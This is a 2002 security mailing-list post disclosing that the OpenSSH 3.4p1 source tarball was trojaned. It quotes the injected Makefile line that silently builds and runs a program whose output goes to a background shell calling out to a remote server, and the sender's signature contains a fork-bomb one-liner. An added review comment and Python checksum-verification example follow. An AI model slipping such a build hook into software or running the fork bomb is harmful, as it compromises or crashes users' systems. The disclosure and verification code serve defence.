Date: Thu, 1 Aug 2002 17:35:12 +1000
From: Edwin Groothuis
To: freebsd-security@freebsd.org
Subject: openssh-3.4p1.tar.gz trojaned
Message-ID: <20020801073512.GB78390@k7.mavetju>

FYI (I'm not on -security)

----- Forwarded message from Edwin Groothuis -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)

The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:

     all: libopenbsd-compat.a
    +	@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to
a server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:

    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:

    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
edwin@mavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
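
Review bot: The recipe line added under "all:" in openbsd-compat/Makefile.in executes code at build time and hides that it does so. It compiles bf-test.c, runs the binary, and passes its output to "sh", while the leading "@" stops make from echoing the command and the trailing "&" detaches the shell from the build. A library target has no reason to run generated shell output, so this line should be rejected and the "all:" recipe left as it was. Any host that ran make on this tree should be treated as having executed bf-test.out.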
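
The checksum comparison described in the message, as an added example that is not part of the original post: it parses pinned digests in the "MD5 (file) = hex" form quoted above and refuses any file that is unpinned or does not match. It goes beyond the message by also accepting SHA256 lines in the same format; the function names and the sample file are constructed for illustration.

```python
import hashlib
import hmac
import os
import re
import tempfile

# BSD-style checksum line, as quoted in the message:
#   MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
LINE_RE = re.compile(
    r"^(?P<algo>MD5|SHA256) \((?P<name>[^)]+)\) = (?P<hex>[0-9a-fA-F]+)$")
DIGEST_LEN = {"MD5": 32, "SHA256": 64}

def parse_pins(text):
    """Return {filename: {algo: hexdigest}} from BSD-style checksum lines."""
    pins = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # ignore anything that is not a checksum line
        algo, name, hexd = m["algo"], m["name"], m["hex"].lower()
        if len(hexd) != DIGEST_LEN[algo]:
            raise ValueError(f"truncated or padded {algo} digest for {name}")
        pins.setdefault(name, {})[algo] = hexd
    return pins

def file_digest(path, algo):
    """Hash the file in chunks so large distfiles are not read into memory."""
    h = hashlib.new(algo.lower())
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(path, pins):
    """True only if the file is pinned and every pinned digest matches."""
    expected = pins.get(os.path.basename(path))
    if not expected:
        return False  # fail closed: no pin means no trust
    return all(hmac.compare_digest(file_digest(path, algo), digest)
               for algo, digest in expected.items())

if __name__ == "__main__":
    # Constructed sample: pin a small file, then alter it after pinning.
    data = b"constructed sample distfile\n"
    path = os.path.join(tempfile.mkdtemp(), "sample.tar.gz")
    with open(path, "wb") as fh:
        fh.write(data)
    pins = parse_pins(f"MD5 (sample.tar.gz) = {hashlib.md5(data).hexdigest()}")
    print("as pinned:", verify(path, pins))
    with open(path, "ab") as fh:
        fh.write(b"x")
    print("after modification:", verify(path, pins))
```

The pinned digests need to come from a channel separate from the download itself, as the ports-system checksum did here.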